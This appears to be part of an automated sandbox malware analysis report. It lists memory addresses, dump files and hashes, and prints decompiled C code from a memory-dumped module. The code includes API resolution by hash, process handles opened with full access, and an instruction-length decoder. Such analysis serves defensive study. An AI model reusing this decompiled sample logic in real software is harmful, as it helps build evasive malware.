0x6ed8a638
0x6ed8a638
0x6ed8a638
0x6ed8a63b
0x6ed8a63b
0x00000000
0x6ed8a63b
0x6ed8a56e
0x6ed8a56e
0x6ed8a570
0x6ed8a581
0x6ed8a583
0x6ed8a585
0x00000000
0x00000000
0x6ed8a591
0x6ed8a592
0x6ed8a596
0x00000000
0x00000000
0x00000000
0x6ed8a596
0x6ed8a587
0x6ed8a58a
0x00000000
0x00000000
0x6ed8a63c
0x6ed8a63c
0x6ed8a63d
0x6ed8a63d
0x00000000
0x6ed8a549
0x6ed8a53f

Strings

, xrefs: 6ED8AAF7

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 39de76d9d1a036128adfba20016a08cbebf9ac327652555606d021711d1c5b32
Instruction ID: 5c6d5400bfa24d2d9dd85896624be5c2362f3fcb02e9e5eaa7e82c9c24b219e6
Opcode Fuzzy Hash: 39de76d9d1a036128adfba20016a08cbebf9ac327652555606d021711d1c5b32
Instruction Fuzzy Hash: DC1281715082059FC754DFA4C880AAFB7B9EF84704F105E2EE999D72A1DB30EC01CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6ED88428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6ED88428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6ED8B658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6ED8F4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6ED8F654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6ED92234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6ED8F654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6ED8F584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6ED8F584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6ED8F4BC(_t449 + 0x14, 0);
									_t180 = E6ED92908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6ED8B5C4(_t449 + 0x34);
										E6ED8B5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6ED8F4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6ED8F4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6ED8B5C4(_t449 + 0x34);
										E6ED8B5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6ED8CA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6ED8C280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6ED8F828(_t449 + 0x14, E6ED8F4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6ED8F4BC(_t449 + 0x14, E6ED8F4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6ED93064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6ED8F828(_t449 + 0x40, E6ED8F4CC(_t449 + 0x3c) + 4);
											 *(E6ED8F4BC(_t449 + 0x40, E6ED8F4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6ED8CD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6ED8F4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6ED8F4BC(_t449 + 0x40, _t431 * 4);
												E6ED88B58( *_t211, E6ED902B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6ED8CD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6ED8F4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6ED8F4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6ED8F4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6ED8F4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6ED8F4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6ED938F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6ED8F4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6ED8F828( *(_t449 + 4), E6ED8F4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6ED8F4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6ED8F4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6ED8F4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6ED8F4BC(_t322, _t430);
										E6ED938F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6ED8F4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6ED8F828(_t322, E6ED8F4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6ED8F828( *(_t449 + 4), E6ED8F4CC( *_t449) + 4);
								 *(E6ED8F4BC( *(_t449 + 4), E6ED8F4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6ED8F828(_t322, E6ED8F4CC(_t322) + 4);
								 *(E6ED8F4BC(_t322, E6ED8F4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6ED8F4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6ED93064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6ED8F4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6ED8F828( *(_t449 + 4), E6ED8F4CC( *_t449) + 4);
										 *(E6ED8F4BC( *(_t449 + 4), E6ED8F4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6ED8F4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6ED8F828( *((intOrPtr*)(_t449 + 0x74)), E6ED8F4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6ED8F4BC( *((intOrPtr*)(_t449 + 0x74)), E6ED8F4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6ED8F4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6ED8F4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6ED8F4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6ED8F4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6ED8F4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6ED8F4BC(_t430, _t443);
										E6ED938F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6ED8F4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6ED8F828(_t430, E6ED8F4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6ED93064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6ED8F4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6ED8F4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6ED8F4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6ED8F4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6ED8F4BC( *(_t449 + 4), _t445);
										E6ED938F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6ED8F4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6ED8F828( *(_t449 + 4), E6ED8F4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6ED8F4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6ed88435
0x6ed8843b
0x6ed8843f
0x6ed88443
0x6ed8844e
0x6ed88452
0x6ed88457
0x6ed8845f
0x6ed8846f
0x00000000
0x6ed88471
0x6ed88479
0x6ed88480
0x6ed88480
0x6ed889d3
0x6ed889d5
0x6ed88a16
0x6ed88a18
0x6ed88a27
0x6ed88a33
0x6ed88a33
0x6ed88a22
0x6ed88a39
0x6ed88a3e
0x00000000
0x6ed88a3e
0x6ed88a26
0x00000000
0x6ed8848a
0x6ed8848e
0x6ed88491
0x6ed88599
0x6ed88599
0x6ed8859e
0x6ed886c1
0x6ed886c5
0x6ed886ca
0x6ed886ce
0x6ed886d2
0x6ed88808
0x6ed8880a
0x6ed8880e
0x6ed88817
0x6ed88822
0x6ed88826
0x6ed8882f
0x6ed88834
0x6ed8883a
0x6ed8883b
0x6ed8883f
0x6ed88843
0x6ed8884a
0x6ed8884c
0x6ed8898c
0x6ed8899d
0x6ed889a4
0x6ed889ab
0x6ed889ab
0x6ed889ae
0x6ed889b1
0x6ed889b4
0x6ed889ba
0x6ed889c1
0x6ed889c5
0x6ed889ce
0x00000000
0x6ed889ce
0x6ed889bc
0x6ed889bf
0x6ed889d8
0x6ed889f0
0x6ed889f3
0x6ed889f8
0x6ed88a02
0x6ed88a05
0x6ed88a08
0x6ed88a11
0x00000000
0x6ed88a11
0x00000000
0x6ed889bf
0x6ed88854
0x6ed88854
0x6ed88856
0x6ed8885a
0x6ed8885f
0x6ed88861
0x6ed88865
0x6ed88868
0x6ed88870
0x6ed88872
0x00000000
0x00000000
0x6ed88889
0x6ed888a4
0x6ed888a6
0x6ed888b4
0x6ed888b9
0x6ed888bb
0x6ed888d8
0x6ed888d8
0x6ed888dc
0x6ed888de
0x00000000
0x00000000
0x6ed888e0
0x6ed888e3
0x6ed88904
0x6ed88923
0x6ed88929
0x6ed8892c
0x6ed88931
0x6ed88932
0x6ed88939
0x00000000
0x00000000
0x6ed88941
0x6ed88941
0x6ed88943
0x6ed8894f
0x6ed8895b
0x6ed8897d
0x6ed88982
0x6ed88983
0x6ed88983
0x00000000
0x6ed88943
0x00000000
0x6ed888e3
0x6ed888bd
0x6ed888c3
0x6ed888c5
0x6ed888c6
0x6ed888c7
0x6ed888c8
0x6ed888cc
0x6ed888d0
0x6ed888d2
0x6ed888d3
0x6ed888d4
0x6ed888d6
0x00000000
0x00000000
0x00000000
0x6ed888d6
0x6ed888e9
0x00000000
0x6ed888e9
0x6ed886d8
0x6ed886da
0x6ed886dc
0x00000000
0x00000000
0x6ed886e6
0x6ed886e6
0x6ed886e8
0x6ed886eb
0x6ed886ed
0x6ed886f5
0x6ed886fc
0x6ed88700
0x6ed88703
0x00000000
0x00000000
0x6ed887ff
0x6ed88800
0x6ed88802
0x00000000
0x00000000
0x00000000
0x6ed88802
0x6ed88709
0x6ed8870c
0x6ed88715
0x6ed8871a
0x6ed8871c
0x6ed88728
0x6ed8872c
0x6ed88731
0x6ed88735
0x6ed88b12
0x6ed88b26
0x6ed88b48
0x6ed88b4d
0x6ed88b4d
0x6ed8874b
0x6ed88750
0x6ed88754
0x6ed88754
0x6ed88754
0x6ed88754
0x6ed88759
0x6ed8875e
0x6ed88760
0x6ed88764
0x6ed8876b
0x6ed88770
0x6ed88772
0x6ed88ad3
0x6ed88ae2
0x6ed88afb
0x6ed88b00
0x6ed88b00
0x6ed88785
0x6ed8878a
0x6ed8878e
0x6ed8878e
0x6ed8878e
0x6ed887a0
0x6ed887c1
0x6ed887c9
0x6ed887d7
0x6ed887f5
0x6ed887fb
0x6ed887fb
0x00000000
0x6ed8870c
0x6ed885a4
0x6ed885a4
0x6ed885a6
0x6ed885ad
0x6ed885bb
0x6ed885bd
0x6ed885c1
0x6ed885c3
0x6ed885c5
0x6ed88600
0x6ed8860f
0x6ed88611
0x6ed88613
0x6ed88631
0x6ed88633
0x6ed88635
0x6ed88647
0x6ed88665
0x6ed8866e
0x6ed88671
0x6ed8867f
0x6ed88690
0x6ed886ae
0x6ed886b0
0x6ed886b4
0x6ed886b4
0x6ed886b4
0x6ed88635
0x00000000
0x6ed88613
0x6ed885cb
0x6ed885cb
0x6ed885d0
0x6ed885d7
0x6ed885e6
0x6ed885ed
0x6ed885ef
0x00000000
0x00000000
0x6ed885fb
0x6ed885fc
0x6ed885fe
0x00000000
0x00000000
0x00000000
0x6ed885fe
0x6ed885f1
0x6ed885f4
0x00000000
0x00000000
0x6ed886b6
0x6ed886b6
0x6ed886b7
0x6ed886b7
0x00000000
0x6ed88497
0x6ed88497
0x6ed88497
0x6ed88499
0x6ed884a0
0x6ed884ae
0x6ed884b0
0x6ed884b4
0x6ed884b6
0x6ed884e2
0x6ed884e6
0x6ed884eb
0x6ed884f0
0x6ed884f4
0x6ed884f8
0x6ed884ff
0x6ed88504
0x6ed88506
0x6ed88a95
0x6ed88aa4
0x6ed88ac3
0x6ed88ac8
0x6ed88ac8
0x6ed88519
0x6ed8851e
0x6ed88522
0x6ed88522
0x6ed88522
0x6ed88533
0x6ed88535
0x6ed88537
0x6ed88548
0x6ed88548
0x6ed8854d
0x6ed88552
0x6ed88556
0x6ed8855b
0x6ed88562
0x6ed88567
0x6ed88569
0x6ed88a57
0x6ed88a63
0x6ed88a7d
0x6ed88a82
0x6ed88a82
0x6ed8857f
0x6ed88584
0x6ed88588
0x6ed88588
0x6ed88588
0x6ed88588
0x6ed8858b
0x6ed8858b
0x00000000
0x6ed8858b
0x6ed884ba
0x6ed884ba
0x6ed884bc
0x6ed884c8
0x6ed884cf
0x6ed884d1
0x00000000
0x00000000
0x6ed884dd
0x6ed884de
0x6ed884e0
0x00000000
0x00000000
0x00000000
0x6ed884e0
0x6ed884d3
0x6ed884d6
0x00000000
0x00000000
0x6ed8858c
0x6ed88590
0x6ed88591
0x6ed88591
0x00000000
0x6ed88499
0x6ed88491

Strings

, xrefs: 6ED88A1A

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 279083827db811fd0b89b997a3ea316dd13a70475ee85e0ee703b4e748732df2
Instruction ID: 437f50876440428cdd96a61ab8b90e556faad0e0248a8c1aa0688b5ce37ed587
Opcode Fuzzy Hash: 279083827db811fd0b89b997a3ea316dd13a70475ee85e0ee703b4e748732df2
Instruction Fuzzy Hash: 1C126F752082499FC714DFA8C890AAFB7E9EF84704F505D2EE599C72A1DB30EC05CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6ED99370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E6ED99370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6ED93698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L18:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L19;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L18;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L19;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L14:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L14;
						}
						if (_t250 == 0x66) goto L13;
						asm("adc [ebx+0x587567f8], eax");
					}
					L19:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L115;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L53:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L86:
								if(_t427[2] <= 5) {
									L88:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
